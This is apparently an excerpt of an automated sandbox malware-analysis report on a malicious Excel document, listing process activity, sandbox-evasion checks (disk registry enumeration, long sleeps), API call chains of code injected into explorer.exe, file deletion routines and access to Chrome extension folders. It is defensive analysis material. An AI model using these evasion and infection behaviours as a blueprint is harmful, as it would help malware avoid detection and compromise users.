            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: #20240627_Edlen_B.xlsStream path 'Workbook' entropy: 7.9984612623 (max. 8.0)
            Source: 6B430000.1.drStream path 'Workbook' entropy: 7.99825955752 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_24-890
            Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 250000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 2290000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 4E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 688Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1471Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 917Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8928Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 675Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3168Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exe TID: 3264Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3400Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3432Thread sleep count: 917 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3432Thread sleep count: 8928 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -6600000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3644Thread sleep count: 675 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3652Thread sleep count: 194 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3648Thread sleep count: 209 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -360000s >= -30000sJump to behavior
            Source: C:\Windows\System32\taskeng.exe TID: 3808Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucw TID: 3852Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3952Thread sleep count: 32 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3952Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3980Thread sleep count: 33 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3980Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4072Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,18_2_00081D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,18_2_00083ED9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,18_2_00082B15
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,20_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
            Source: C:\Windows\explorer.exeCode function: 23_2_00061EB4 FindFirstFileW,23_2_00061EB4
            Source: C:\Windows\explorer.exeCode function: 23_2_00061DB0 FindFirstFileW,23_2_00061DB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00086512 GetSystemInfo,18_2_00086512
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
